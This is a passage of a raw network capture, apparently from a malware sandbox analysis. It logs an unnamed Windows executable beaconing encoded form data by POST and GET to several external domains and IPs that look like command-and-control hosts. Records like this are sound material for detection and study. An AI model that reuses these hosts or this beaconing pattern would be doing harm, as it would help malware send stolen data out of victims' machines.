A8_pSPdX=otZcyeHXRsUak9dft8vHA3qkKW/69xQld1nL2RuvGW4ovjf0AZSecoOdLZnhL09yMzCGDXytIvncyg6AEz+ppbmocYNrogY+djApQ5ijbGvprOYHmyhkwLlx5RcEN1OX1lHG1kapcxWIbs21EbDnBWRc25WMEmW5Pk6dh6EgQzC00tgzF9WVq1wSaUXfgE6FNIPKRWJGI8BXf6ybHjM+O1zLHuux2/kO5i+URfpby2y8aI+Ngl5gvJTUmE2h+UrDyeMl6JLQaBCrxHMph94YUG86rlbO1V58S65u3htiClGXc/kFXdnDgp2o6WShLq9l3QODG8o6xLnzvCOhjrMeifphPBSEsIKx3e/eT4eUH8vs8QGo1f+lHt7SwfUR1ZskCd+Np+XveUNe/keZBVXIcEtB08OGFDAH4lrTo0oot9ooJ0s2wzz0SMrSTgeLY4zx9QYFdi5XsQgYJ3Gw/gHtmlOXk+dfQHSpUAeXcJVm8vtqaGTCnVIo+tG8Jec1SMTCqj/v+cJFGep7Y16Jr7nF3KPmNDbYIyEtkpFLvxavQiZi0Q3aofdAKf4UucDl/gbzFgZeoNlZgvn1N9v2HZ4K/3vl/3zKcGHLWBEArq8VuCvyl2ypOXhZU7WJHEto0wbBolZGaQ1lbAZxf/JtWEtym/uCcZuA/uuO8ZGgMu+rVCR0RYSq0gYqLDkzO7egPMLGpOIIsG9iWDbqfYNnIWNqHlpZN2MCA53uS7yWN0T5rYOtU0EyeOgKlSzvRkzwLn/sUlJIpV87VbUognRSsM283SB4GpVKJyy2x8ALiFmV2l0nIySv4jISdphV1EhARuSmJ55yQ1fbXuCIs713g9gNLAz8ClAwkNJrT21NzuSIzkY/B84oApehmn2r6FgSngLdd6epOJDE8o+eDQWZzIz/4KzBzvKL91O/U7Z0pb7ijIhkYBCjOr3r8HwIVD5V0SFwit5kjaRY0aUQk4/bsIGp45vr8iryP3Y5uXc6rkKQCYf [TRUNCATED]
Sep 5, 2024 09:06:40.509785891 CEST	1786	OUT	Data Raw: 72 78 32 7a 6e 41 6f 4b 49 62 35 4f 66 75 35 6c 65 45 78 6c 71 4c 58 47 7a 6b 7a 6d 4c 37 38 4b 33 36 68 77 50 71 4f 6d 68 61 64 73 6b 77 56 66 6f 69 2b 53 56 7a 77 6f 41 59 54 68 39 6d 78 4c 6b 4b 46 70 75 54 77 46 41 54 53 4d 62 75 75 55 74 62 Data Ascii: rx2znAoKIb5Ofu5leExlqLXGzkzmL78K36hwPqOmhadskwVfoi+SVzwoAYTh9mxLkKFpuTwFATSMbuuUtbUlZG0EksI6jtnm6mnjPFbISEN4gw+7aOOeedsLWERdA/aeje6IXdVR/8cWOP1ApNjDTpoxYXmjUp1xQNl7Pb5xdHahZVOw0+wun8BxBEoBz8q4YdpkKXLZ6AchJAn9heIuTvn+b4lYAYH0lULjagNyduYq9H5q6Ep
Sep 5, 2024 09:06:41.114365101 CEST	500	IN	HTTP/1.1 404 Not Found Date: Thu, 05 Sep 2024 07:06:41 GMT Server: Apache X-Xss-Protection: 1; mode=block Referrer-Policy: no-referrer-when-downgrade X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.22	49182	91.184.0.200	80	1036	C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe

Timestamp	Bytes transferred	Direction	Data
Sep 5, 2024 09:06:43.042484045 CEST	564	OUT	GET /ikh0/?38R0=jHY4nFvHAVc8&A8_pSPdX=lvx8xqKuEeZXr5ITqJXMOhHudBjI1DEsZETVjxqXK0Zv2i3/Db6zHLOVaJTsGghSb2zUIGDfA5rd637aCh7mkrK3VrsyjhlNST0gb4jcYSXv3tE6yFdk4d8M6F9v HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Host: www.jobworklanka.online Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Sep 5, 2024 09:06:43.664164066 CEST	500	IN	HTTP/1.1 404 Not Found Date: Thu, 05 Sep 2024 07:06:43 GMT Server: Apache X-Xss-Protection: 1; mode=block Referrer-Policy: no-referrer-when-downgrade X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.22	49183	13.248.169.48	80	1036	C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe

Timestamp	Bytes transferred	Direction	Data
Sep 5, 2024 09:06:48.751543045 CEST	2472	OUT	POST /h7lb/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Host: www.dyme.tech Origin: http://www.dyme.tech Content-Type: application/x-www-form-urlencoded Content-Length: 2165 Connection: close Cache-Control: max-age=0 Referer: http://www.dyme.tech/h7lb/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Data Raw: 41 38 5f 70 53 50 64 58 3d 63 5a 6e 6e 5a 35 6c 77 39 6d 56 6f 73 4f 47 4a 59 4f 6b 54 33 6e 37 47 38 55 79 74 53 33 75 78 36 55 4a 75 34 2f 31 44 4d 62 54 4a 6b 2b 51 58 73 56 38 58 4c 77 38 39 36 6c 31 6b 31 38 55 4d 5a 53 77 49 6d 33 72 78 30 45 43 7a 38 74 55 52 4c 5a 50 36 57 65 77 69 70 71 6e 4b 74 4e 6b 35 73 77 45 5a 38 63 53 42 39 4e 73 66 55 49 52 43 30 33 65 6b 74 4d 2b 6b 42 57 45 55 4e 44 75 51 76 4a 4e 50 75 34 6c 41 47 57 4a 55 6b 43 42 69 55 36 78 46 33 57 50 63 48 79 44 45 67 4f 74 67 31 73 41 79 31 54 6d 37 4d 2f 77 71 4c 37 53 73 71 64 35 63 30 50 6b 71 75 53 51 67 31 79 70 31 79 44 66 54 4f 73 42 68 73 64 69 66 76 69 5a 61 4e 79 4e 66 54 50 48 51 6b 77 70 6f 67 77 66 41 38 46 4b 54 55 69 61 75 74 30 59 78 63 2f 43 2b 78 41 64 4d 4f 58 33 6f 2b 57 74 73 4e 58 32 6a 30 44 63 71 6e 34 63 57 65 75 6e 7a 62 6e 68 68 59 75 55 36 7a 4f 45 6d 75 74 49 63 76 45 49 55 35 39 6a 70 61 42 61 32 6d 2f 50 6c 45 69 52 68 47 36 77 4f 5a 5a 30 38 66 32 6b 44 77 6f 51 67 53 6f 55 51 37 48 63 75 67 [TRUNCATED] Data Ascii: A8_pSPdX=cZnnZ5lw9mVosOGJYOkT3n7G8UytS3ux6UJu4/1DMbTJk+QXsV8XLw896l1k18UMZSwIm3rx0ECz8tURLZP6WewipqnKtNk5swEZ8cSB9NsfUIRC03ektM+kBWEUNDuQvJNPu4lAGWJUkCBiU6xF3WPcHyDEgOtg1sAy1Tm7M/wqL7Ssqd5c0PkquSQg1yp1yDfTOsBhsdifviZaNyNfTPHQkwpogwfA8FKTUiaut0Yxc/C+xAdMOX3o+WtsNX2j0Dcqn4cWeunzbnhhYuU6zOEmutIcvEIU59jpaBa2m/PlEiRhG6wOZZ08f2kDwoQgSoUQ7Hcugp2K9/2CaL5taBt4dVspn5in79c/TEZdicUb+GIzyXIKGi893alvbq8tO+iEtkUiCJx2opeRQiXfCTjmw+hnLGDDt0VSizOG0e6qDMUhNMCKYQUZ/eyxKEjldJ/lqYlWEN02MFYmCjaSY7mV3suWFhRqmmwSi2UbWELY117pt1qNzFYoFDFZfcBc4zLkZVdaNPNsmXPSHGLEqbasKTbu0T5zYzTy+Djc+qNVZZrgybUzND2MeiHYAUcXThwhPNd3+XJHVzXsLO7MUlEVlqr1k9QI+HugUgnONwJaU1liVrFCm+QbXrc4kUQ/LpNzW9sBw+AWID3FKJRs+O6Kkx2ro09CJpwfi3xwTdeZPQCm2hmjlpnaAjyj0tYBkxNxyZrxPcLw7XMnZRAsriF9Myjpjkk6DPtr5y+XfjlsfLOJIcIgqmbKyIwfZWFuBiZ99eJgmzjjTRTidjQs2cISr8y0ErQ/6aadPf4vi8PoyObVzewgmt3FpzH2G3FMXST2ZpBMPvEgEb94W45fORY9ck3zv4v+en75evDpK6vOwwv+uVugXjDCe1aBBjEHQw7wGuU+5/YS3WTdqQKphtdF0mkYeMf33q0jnFIO/eluvQ7dFnPucpCeMorJFS2uWmCXyqqBpwLXyx6pUBx+EzVhOq52iNG87afBIaQl0Yi [TRUNCATED]
Sep 5, 2024 09:06:48.756890059 CEST	292	OUT	Data Raw: 65 43 5a 7a 76 43 32 58 6e 74 4b 70 58 75 38 65 79 75 6d 36 79 34 77 47 59 51 78 78 56 69 6d 70 35 36 78 55 59 6d 37 52 7a 54 4b 71 63 46 6a 31 30 34 37 35 4f 72 64 35 32 57 77 77 2b 6e 71 72 43 57 70 2f 67 70 72 75 61 42 71 6f 50 35 70 52 7a 6e Data Ascii: eCZzvC2XntKpXu8eyum6y4wGYQxxVimp56xUYm7RzTKqcFj10475Ord52Www+nqrCWp/gpruaBqoP5pRznsSQC61/DCz0dPCmjHSanZ5QFu1UKdo6VNYJf7mH8f5QxwCeGjsIrZP9TUjTK4mUujGdLeG6LM4l1/cdRvknJLdNV0MFdpusDhIRKQsRrJkvHeejFKNUXFQTjGMO0NMvxT9TD0rb0h0J4rEuB83dUXFYw/z2Hy2cx8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.22	49184	13.248.169.48	80	1036	C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe

Timestamp	Bytes transferred	Direction	Data
Sep 5, 2024 09:06:51.301711082 CEST	2472	OUT	POST /h7lb/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Host: www.dyme.tech Origin: http://www.dyme.tech Content-Type: application/x-www-form-urlencoded Content-Length: 3629 Connection: close Cache-Control: max-age=0 Referer: http://www.dyme.tech/h7lb/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Data Raw: 41 38 5f 70 53 50 64 58 3d 63 5a 6e 6e 5a 35 6c 77 39 6d 56 6f 74 70 43 4a 5a 63 63 54 79 6e 37 46 2b 55 79 74 53 33 75 2f 36 55 4a 63 34 2f 31 44 4d 61 76 4a 6b 39 49 58 73 6c 38 58 4b 77 39 50 6d 31 31 6b 31 38 56 2b 5a 53 4e 54 6d 33 6e 48 30 47 71 7a 38 70 41 52 4c 61 6e 36 52 65 77 69 6d 4b 6e 49 74 4e 6f 50 73 77 4a 43 38 59 69 72 39 4f 67 66 56 2b 64 43 35 45 36 6c 6e 63 2b 69 44 57 46 49 4e 44 54 6b 76 49 31 66 75 34 42 51 47 52 5a 55 6b 79 42 69 46 36 78 45 71 6d 50 5a 4e 53 44 57 67 4f 52 64 31 73 42 37 31 54 69 52 4d 2f 38 71 4c 70 32 73 71 63 35 66 37 2f 6b 74 7a 43 51 67 37 53 70 33 79 44 66 50 4f 73 42 68 73 64 65 66 39 43 5a 61 4e 7a 4e 59 64 76 48 51 71 51 70 76 6b 77 54 54 38 42 71 78 55 69 71 2b 74 46 4d 78 66 37 36 2b 6e 67 64 4d 47 48 33 75 2b 57 74 72 58 6e 32 56 30 44 55 69 6e 34 4d 47 65 75 6e 7a 62 6c 70 68 63 39 38 36 36 2b 45 6d 68 4e 49 52 6d 6b 49 62 35 2b 50 4c 61 46 53 32 6d 36 62 6c 47 51 4a 68 53 49 59 52 57 4a 30 78 4f 6d 6b 42 30 6f 51 31 53 70 38 2b 37 48 55 49 67 [TRUNCATED] Data Ascii: A8_pSPdX=cZnnZ5lw9mVotpCJZccTyn7F+UytS3u/6UJc4/1DMavJk9IXsl8XKw9Pm11k18V+ZSNTm3nH0Gqz8pARLan6RewimKnItNoPswJC8Yir9OgfV+dC5E6lnc+iDWFINDTkvI1fu4BQGRZUkyBiF6xEqmPZNSDWgORd1sB71TiRM/8qLp2sqc5f7/ktzCQg7Sp3yDfPOsBhsdef9CZaNzNYdvHQqQpvkwTT8BqxUiq+tFMxf76+ngdMGH3u+WtrXn2V0DUin4MGeunzblphc9866+EmhNIRmkIb5+PLaFS2m6blGQJhSIYRWJ0xOmkB0oQ1Sp8+7HUIgqeK95iCdq5taxt7JFslwper77FcTEMmiZMbsnIz1SULJy8/nKkgRK9WO+3ntgMiC8N2ptqRXQ/YTTjl0+hwd2Cfty4Hix2W1siqC8UhOvqFZAVRluzoEUjJdJ/XqZE0EcM2MFomCxCSY7mUwsvdXhVYmm8ei24yWCnY1lrptwGNoVYoMjERIMB84z2TZUknN5hsm2/SFFvEs7auITbjqj5UYzDy+C2b+rlVZ6zgz6UzLD2ABSGGAUcxTh0tPNMK+VdHVyXscbXMOVEWnqrxudR2+GWKUjzoNzZaVUFiWepCmeQOK7c4xkQRLtpFW5k/w7kWL3zFNpRvk+6Jix2q/E8bJpgfi2NwTd2ZPhCmxS+jjpnYKDyPhdlWkxdXybHhPf/w6C0neXcvuSF/JyjnnkkSDPtv52y9fSFsR6CJbOsh1WbNnYwIU2FSBm9X9cVwnAHjTSbidRos2sISr8yzErRX6aWvPadni8PozfbVysogsN3AnjHtC3FoXSWfZpZqPvggLqd4W45eABY+VE3wv5Ssen7Hev/pKM3Oyjn+u2GgejDCf1aALDECQw7gGshz59gS3ifdpTiqntdE2mlDUsan3q4rnEsOq+ZupR7dFXPuSpCZHIrcBXvvWmO9yr6RpEPXwCSpWGl9MjVsKq54iM6f7anaIZAT0aS [TRUNCATED]
Sep 5, 2024 09:06:51.306705952 CEST	1756	OUT	Data Raw: 65 41 39 7a 76 44 36 58 6d 4b 65 70 58 4f 38 52 71 75 6d 76 79 34 77 4d 59 51 5a 49 56 67 79 35 35 37 42 55 5a 45 44 52 79 51 53 71 57 56 6a 33 30 34 37 7a 41 4c 5a 51 32 57 78 4a 2b 6e 65 72 43 56 42 2f 67 75 58 75 61 52 71 70 41 70 70 63 2b 48 Data Ascii: eA9zvD6XmKepXO8Rqumvy4wMYQZIVgy557BUZEDRyQSqWVj3047zALZQ2WxJ+nerCVB/guXuaRqpAppc+HsVJS6p/DC/0cjomjTSa1x5U0u1U6chtFN1YP25H8DlQwB3fy3sL4hP7h8jeK4rI+jxdKjr6Lcal0u5dgjkpZLdJXcLStpkkjh/RKR7RopevGDVjH6NUSZQTTGPZUNGjRSiTD4Ob0paJ47EuBg3c0HFfw/z7nyzVR8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.22	49185	13.248.169.48	80	1036	C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe

Timestamp	Bytes transferred	Direction	Data
Sep 5, 2024 09:06:53.868098974 CEST	554	OUT	GET /h7lb/?A8_pSPdX=RbPHaORuq3VLsIvFE6xZ51H5/nq3Q2KtxUtCmsRXGI6jytYd3WVHUDgAs1Bl5qF7JnhTmlf74Hij29gRJq6necArhbC5i9d55ywI/6qv4tUNL5QxhF6ks96lGiUd&38R0=jHY4nFvHAVc8 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Host: www.dyme.tech Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Sep 5, 2024 09:06:54.314297915 CEST	406	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 05 Sep 2024 07:06:54 GMT Content-Type: text/html Content-Length: 266 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 41 38 5f 70 53 50 64 58 3d 52 62 50 48 61 4f 52 75 71 33 56 4c 73 49 76 46 45 36 78 5a 35 31 48 35 2f 6e 71 33 51 32 4b 74 78 55 74 43 6d 73 52 58 47 49 36 6a 79 74 59 64 33 57 56 48 55 44 67 41 73 31 42 6c 35 71 46 37 4a 6e 68 54 6d 6c 66 37 34 48 69 6a 32 39 67 52 4a 71 36 6e 65 63 41 72 68 62 43 35 69 39 64 35 35 79 77 49 2f 36 71 76 34 74 55 4e 4c 35 51 78 68 46 36 6b 73 39 36 6c 47 69 55 64 26 33 38 52 30 3d 6a 48 59 34 6e 46 76 48 41 56 63 38 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?A8_pSPdX=RbPHaORuq3VLsIvFE6xZ51H5/nq3Q2KtxUtCmsRXGI6jytYd3WVHUDgAs1Bl5qF7JnhTmlf74Hij29gRJq6necArhbC5i9d55ywI/6qv4tUNL5QxhF6ks96lGiUd&38R0=jHY4nFvHAVc8"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.22	49189	43.242.202.169	80	1036	C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe

Timestamp	Bytes transferred	Direction	Data
Sep 5, 2024 09:07:10.598164082 CEST	2472	OUT	POST /e0nr/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Host: www.mizuquan.top Origin: http://www.mizuquan.top Content-Type: application/x-www-form-urlencoded Content-Length: 2165 Connection: close Cache-Control: max-age=0 Referer: http://www.mizuquan.top/e0nr/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Data Raw: 41 38 5f 70 53 50 64 58 3d 48 39 52 71 32 52 73 37 65 59 65 69 61 4a 46 58 64 6b 64 38 6c 6b 41 59 73 6a 6d 73 39 4b 45 30 68 55 4d 52 77 6f 69 35 77 35 67 6b 39 6e 64 65 64 42 46 50 4c 31 7a 76 49 75 37 4f 78 4a 54 45 44 63 51 6b 38 34 37 48 69 4a 5a 42 48 2b 4a 32 66 35 52 39 4c 6d 38 32 61 34 53 45 34 4c 6f 70 33 55 42 79 51 51 71 47 50 35 79 50 30 53 76 4c 72 5a 50 73 4e 33 51 2f 59 65 6c 64 58 62 67 35 30 75 73 79 50 53 76 45 4f 2f 6a 48 6d 56 76 47 37 44 43 53 41 43 2b 72 4e 74 56 55 32 6f 68 74 4e 39 51 33 58 4a 66 36 64 55 68 51 74 2f 71 74 6a 46 39 5a 66 59 51 67 62 6e 55 30 36 61 6c 76 4e 2f 4e 55 7a 62 46 36 41 31 7a 57 31 63 6e 46 74 75 4c 50 54 51 65 51 35 73 31 67 42 6b 30 6a 64 50 2f 67 74 71 4a 4a 66 72 35 57 7a 54 6c 67 41 2b 39 72 4a 51 62 2f 41 6b 56 4f 30 43 45 34 50 46 2b 45 65 57 2f 73 55 2f 4b 44 6e 5a 4a 35 39 55 54 35 59 73 52 54 32 67 61 42 44 76 33 4e 46 69 38 33 35 45 65 7a 45 6e 50 50 65 65 6d 62 72 65 47 48 52 50 6a 6f 55 4a 2b 35 44 54 47 69 6b 79 45 2b 6c 51 35 4a 65 [TRUNCATED] Data Ascii: A8_pSPdX=H9Rq2Rs7eYeiaJFXdkd8lkAYsjms9KE0hUMRwoi5w5gk9ndedBFPL1zvIu7OxJTEDcQk847HiJZBH+J2f5R9Lm82a4SE4Lop3UByQQqGP5yP0SvLrZPsN3Q/YeldXbg50usyPSvEO/jHmVvG7DCSAC+rNtVU2ohtN9Q3XJf6dUhQt/qtjF9ZfYQgbnU06alvN/NUzbF6A1zW1cnFtuLPTQeQ5s1gBk0jdP/gtqJJfr5WzTlgA+9rJQb/AkVO0CE4PF+EeW/sU/KDnZJ59UT5YsRT2gaBDv3NFi835EezEnPPeembreGHRPjoUJ+5DTGikyE+lQ5JenX+0uV2G0C/brqJBcX+Y0EgKHhfBAEj/ow7Ll7LAyAQITE3/czRCe4LSH+9l+T64A0UaO87TvpMz/9CmBaa0M1BFs6rUWnxuD49ZkpH45lnaXN4ryEBxQfP3l1DhmJiQqro6cbaRQgFNwyzyn3lr7szOW4/LfXglpgrwDkwRst1dOhWuLsNxgTAbeofJ53aExtmUsE8qqXC5tYJnJtbbrAEDAHr0IFLYxZNRAa+jDhVPkFmN5Gx22SLUfpvdtN6knbjAwlgr8d53a8TtqLlxCX98lB8duwWWZxzQ30UvenKZ914w877ayNgtqdnFMVT3pT45rhWgzj+PNj1SVHHrSzspy3TSOEkhrfUm3v5eGLCUxBZROwqoP3z2KQQKlXTrqC5pRLbOpaxkUHNlOdulbYfn1nEsprQ7K2Ez9QwtItuYWz+xBqtmLneB4eo0VqCTDKP6+Wi1KJYrPWvBi7DReS1NYyYALIRkW34d1I3zle19wFHRM7ar1MewPYwBQ5+euPCXnsWLEqLsleJ6KwhDTi2W0zj0fhFkdx036OQYbAKDPZHDbTootdn4aYeG5FSySaaF0rXku38R8wj2b17xCvr4bNbiT6URdzAXPjj44aiOHLEQCnZSbi/JujdISKkZ/rEF8m7kS7/alwZVMPf+En8sdkJ+btwKZV [TRUNCATED]
Sep 5, 2024 09:07:10.603208065 CEST	301	OUT	Data Raw: 69 42 6c 76 4e 50 2f 42 57 50 33 78 6a 78 73 57 5a 56 33 63 79 33 61 54 4a 50 42 59 50 32 6d 49 37 32 30 77 62 32 66 6b 6f 57 42 4f 2b 6c 57 72 4d 47 77 47 6f 53 4b 58 6c 7a 77 50 57 55 31 47 6f 74 2b 42 63 6e 70 51 76 55 63 30 6b 6e 6f 4b 54 31 Data Ascii: iBlvNP/BWP3xjxsWZV3cy3aTJPBYP2mI720wb2fkoWBO+lWrMGwGoSKXlzwPWU1Got+BcnpQvUc0knoKT1iXLwWvfBVTPUqwY1O+0k1MWz4ZgKlpHyCN0jEwktEROeLuUn97A3ov0t38Ahxy+QracVbCgIBwUaQwfQ+EsCuX6dLlgIj/Uh9dqPxfi5dyF3CwuuBVqgyYPl5VuwKXoasxIH2vJBxggTTy0E5GrAfTd+YSxprZgzo
Sep 5, 2024 09:07:11.485670090 CEST	691	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 05 Sep 2024 07:07:11 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.22	49190	43.242.202.169	80	1036	C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe

Timestamp	Bytes transferred	Direction	Data
Sep 5, 2024 09:07:13.142992973 CEST	2472	OUT	POST /e0nr/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Host: www.mizuquan.top Origin: http://www.mizuquan.top Content-Type: application/x-www-form-urlencoded Content-Length: 3629 Connection: close Cache-Control: max-age=0 Referer: http://www.mizuquan.top/e0nr/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Data Raw: 41 38 5f 70 53 50 64 58 3d 48 39 52 71 32 52 73 37 65 59 65 69 61 75 70 58 51 78 70 38 6f 30 41 66 7a 7a 6d 73 39 4b 45 32 68 55 4d 5a 77 6f 69 35 77 39 34 6b 39 6b 56 65 65 52 46 50 4b 31 7a 75 54 75 